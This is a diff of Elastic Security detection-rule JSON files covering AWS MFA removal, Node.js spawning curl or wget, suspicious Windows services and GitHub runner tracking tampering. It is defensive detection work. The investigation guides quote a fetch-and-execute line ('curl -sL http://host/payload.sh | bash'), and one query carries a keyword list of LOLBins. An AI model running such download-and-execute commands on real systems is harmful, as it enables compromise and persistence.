when a user signs in to an AWS Management Console, they will be prompted for their user name and password (the first factor\u2014what they know), as well as for an authentication code from their AWS MFA device (the second factor\u2014what they have). Taken together, these multiple factors provide increased security for your AWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThis rule looks for the deactivation or deletion of AWS MFA devices. These modifications weaken account security and can lead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. The security team should address any potential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:(DeactivateMFADevice or DeleteVirtualMFADevice) and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/deactivate-mfa-device.html", - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeactivateMFADevice.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Resources: Investigation Guide", - "Tactic: Impact", - "Tactic: Persistence" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1531", - "name": "Account Access Removal", - "reference": "https://attack.mitre.org/techniques/T1531/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/", - "subtechnique": [ - { - "id": "T1556.006", - "name": "Multi-Factor Authentication", - "reference": "https://attack.mitre.org/techniques/T1556/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 210 - }, - "id": "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d9af2479-ad13-4471-a312-f586517f1243_3.json b/packages/security_detection_engine/kibana/security_rule/d9af2479-ad13-4471-a312-f586517f1243_3.json new file mode 100644 index 00000000000..515e9dddf85 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d9af2479-ad13-4471-a312-f586517f1243_3.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Curl or Wget Spawned via Node.js", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Curl or Wget Spawned via Node.js\n\nThis rule flags Node.js launching curl or wget, directly or via a shell, a common technique to fetch payloads and enable command-and-control. Attackers often abuse child_process in Node apps to run \"curl -sL http://host/payload.sh | bash,\" pulling a second stage from a remote host and executing it immediately under the guise of legitimate application activity.\n\n### Possible investigation steps\n\n- Pull the full process tree and command line to extract URLs/domains, flags (e.g., -sL, -O, --insecure), and identify whether the output is piped into an interpreter, indicating immediate execution risk.\n- Correlate with file system activity to find newly created or modified artifacts (e.g., in /tmp, /var/tmp, /dev/shm, or the app directory), then hash and scan them and check for follow-on executions.\n- Pivot to network telemetry to enumerate connections around the event from both Node.js and the child process, assessing destination reputation (IP/domain, ASN, geo, cert/SNI) against approved update endpoints.\n- Trace the initiating Node.js code path and deployment (child_process usage such as exec/spawn/execFile), and review package.json lifecycle scripts and recent npm installs or postinstall hooks for unauthorized download logic.\n- Verify user and runtime context (service account/container/pod), inspect environment variables like HTTP(S)_PROXY/NO_PROXY, and check whether credentials or tokens were passed to curl/wget to assess exposure.\n\n### False positive analysis\n\n- A legitimate Node.js service executes curl or wget to retrieve configuration files, certificates, or perform health checks against approved endpoints during startup or routine operation.\n- Node.js install or maintenance scripts use a shell with -c to run curl or wget and download application assets or updates, triggering the rule even though this aligns with expected deployment workflows.\n\n### Response and remediation\n\n- Immediately isolate the affected host or container, stop the Node.js service that invoked curl/wget (and any parent shell), terminate those processes, and block the exact URLs/domains/IPs observed in the command line and active connections.\n- Quarantine and remove any artifacts dropped by the downloader (e.g., files in /tmp, /var/tmp, /dev/shm or paths specified by -O), delete added cron/systemd entries referencing those files, and revoke API tokens or credentials exposed in the command line or headers.\n- Escalate to full incident response if output was piped to an interpreter (curl ... | bash or wget ... | sh), if --insecure/-k or self-signed endpoints were used, if unknown external infrastructure was contacted, or if secrets were accessed or exfiltrated.\n- Rebuild and redeploy the workload from a known-good image, remove the malicious child_process code path from the Node.js application, restore validated configs/data, rotate any keys or tokens used by that service, and verify no further curl/wget spawns occur post-recovery.\n- Harden by removing curl/wget from runtime images where not required, enforcing egress allowlists for the service, constraining execution with AppArmor/SELinux/seccomp and least-privilege service accounts, and adding CI/CD checks to block package.json postinstall scripts or code that shells out to downloaders.\n", + "query": "process where event.type == \"start\" and\n event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\n process.parent.name in (\"node\", \"bun\", \"node.exe\", \"bun.exe\") and (\n (\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"cmd.exe\", \"bash.exe\", \"powershell.exe\") and\n process.command_line like~ (\"*curl*http*\", \"*wget*http*\")\n ) or \n (\n process.name in (\"curl\", \"wget\", \"curl.exe\", \"wget.exe\")\n )\n) and\n not process.command_line like (\"*127.0.0.1*\", \"*localhost*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d9af2479-ad13-4471-a312-f586517f1243", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "d9af2479-ad13-4471-a312-f586517f1243_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_112.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_112.json deleted file mode 100644 index d7ea7e4ad01..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_112.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the creation of a new Windows service with suspicious Service command values. Windows services typically run as SYSTEM and can be used for privilege escalation and persistence.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-system.system*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image,\\nissuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image =\\nauthenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image,\\nissuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image =\\nauthenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\127.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\127.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.ImagePath", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.ServiceFileName", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "da87eee1-129c-4661-a7aa-57d0b9645fad", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs", - "Data Source: Windows System Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/", - "subtechnique": [ - { - "id": "T1543.003", - "name": "Windows Service", - "reference": "https://attack.mitre.org/techniques/T1543/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 112 - }, - "id": "da87eee1-129c-4661-a7aa-57d0b9645fad_112", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dca28dee-c999-400f-b640-50a081cc0fd1_212.json b/packages/security_detection_engine/kibana/security_rule/dca28dee-c999-400f-b640-50a081cc0fd1_212.json new file mode 100644 index 00000000000..aa80801796b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dca28dee-c999-400f-b640-50a081cc0fd1_212.json @@ -0,0 +1,67 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (country) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s).", + "false_positives": [ + "New or unusual command and user geolocation activity can be due to manual troubleshooting or reconfiguration; changes in cloud automation scripts or workflows; adoption of new services; expansion into new regions; increased adoption of work from home policies; or users who travel frequently." + ], + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "rare_method_for_a_country", + "name": "Unusual Country For an AWS Command", + "note": "## Triage and analysis\n\n### Investigating Unusual Country For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is sourcing from a geolocation (country) that is unusual for the command. This can be the result of compromised credentials or keys used by a threat actor in a different geography than the authorized user(s).\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation of the source IP address.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False Positive Analysis\n\n- False positives can occur if activity is coming from new employees based in a country with no previous history in AWS.\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + } + ], + "risk_score": 21, + "rule_id": "dca28dee-c999-400f-b640-50a081cc0fd1", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from AWS.\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### AWS Integration Setup\nThe AWS integration allows you to collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"aws\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAWS\u201d and select the integration to see more details about it.\n- Click \u201cAdd AWS\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201caws\u201d to an existing or a new agent policy, and deploy the agent on your system from which aws log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://www.elastic.co/docs/current/integrations/aws).\n", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "type": "machine_learning", + "version": 212 + }, + "id": "dca28dee-c999-400f-b640-50a081cc0fd1_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_5.json index f23a1bcec62..0077e30a6d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_5.json +++ b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_5.json @@ -21,7 +21,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/df0553c8-2296-45ef-b4dc-3b88c4c130a7_1.json b/packages/security_detection_engine/kibana/security_rule/df0553c8-2296-45ef-b4dc-3b88c4c130a7_1.json new file mode 100644 index 00000000000..c1901ae450d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df0553c8-2296-45ef-b4dc-3b88c4c130a7_1.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects processes spawned by GitHub Actions runners where \"RUNNER_TRACKING_ID\" is overridden from its default \"github_*\" value. Such tampering has been associated with attempts to evade runner tracking/cleanup on self-hosted runners, including behavior observed in the Shai-Hulud 2.0 npm worm campaign.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners\n\nThis rule surfaces processes launched by GitHub Actions runners where RUNNER_TRACKING_ID is deliberately set to a non-default value. Attackers do this to break runner job tracking and cleanup on self-hosted runners, enabling long\u2011lived or hidden workloads. A common pattern is a workflow step that exports a custom RUNNER_TRACKING_ID and then spawns bash or node to fetch and execute a script via curl|bash or npm install scripts, keeping the process alive after the job finishes to run mining or exfil tasks.\n\n### Possible investigation steps\n\n- Correlate the event to its GitHub Actions run/job and workflow YAML, identify the repository and actor (commit/PR), and verify whether RUNNER_TRACKING_ID was explicitly set in the workflow or injected by a step script.\n- On the runner host, determine if the spawned process persisted beyond job completion by checking for orphaning or reparenting to PID 1, sustained CPU/memory usage, and timestamps relative to the runner process exit.\n- Review nearby telemetry for fetch-and-execute patterns (curl|bash, wget, node/npm lifecycle scripts), unexpected file writes under /tmp or actions-runner/_work, and outbound connections to non-GitHub endpoints.\n- Enumerate persistence artifacts created during the run, including crontab entries, systemd unit files, pm2 or nohup sessions, and changes to authorized_keys or rc.local, and tie them back to the suspicious process.\n- Assess blast radius by listing secrets and tokens available to the job, checking audit logs for their subsequent use from the runner IP or unusual repositories, and decide whether to revoke or rotate credentials.\n\n### False positive analysis\n\n- A self-hosted runner bootstrap script or base image intentionally sets a fixed RUNNER_TRACKING_ID for internal log correlation or debugging, causing all runner-spawned processes to inherit a non-github_* value.\n- A composite action or reusable workflow accidentally overrides RUNNER_TRACKING_ID through env mapping or variable expansion (for example templating it from the run ID), resulting in benign non-default values during standard jobs.\n\n### Response and remediation\n\n- Quarantine the self-hosted runner by stopping Runner.Listener, removing the runner from the repository/organization, and terminating any Runner.Worker children or orphaned processes (PID 1) that carry a non-default RUNNER_TRACKING_ID.\n- Purge persistence by removing artifacts created during the run, including systemd unit files under /etc/systemd/system, crontab entries in /var/spool/cron, pm2/nohup sessions, edits to ~/.ssh/authorized_keys or /etc/rc.local, and files under /tmp and actions-runner/_work linked to the tampered process.\n- Revoke and rotate credentials exposed to the job (GITHUB_TOKEN, personal access tokens, cloud keys), delete leftover containers and caches in actions-runner/_work, invalidate the runner registration, and redeploy the runner from a clean, patched image.\n- Escalate to incident response if you observe outbound connections to non-GitHub endpoints, processes persisting after job completion, modifications to ~/.ssh/authorized_keys or /etc/systemd/system, or repeated RUNNER_TRACKING_ID tampering across runners or repositories.\n- Harden by restricting self-hosted runners to trusted repositories and actors, enforcing ephemeral per-job runners with egress allowlisting to github.com, setting strict job timeouts, and adding a workflow guard step that exits if RUNNER_TRACKING_ID does not start with github_.", + "query": "process where host.os.type in (\"linux\", \"macos\") and event.type == \"start\" and event.action == \"exec\" and\nprocess.parent.name in (\"Runner.Worker\", \"Runner.Listener\") and process.env_vars like~ \"RUNNER_TRACKING_ID*\" and\nnot process.env_vars like~ \"RUNNER_TRACKING_ID=github_*\"\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + 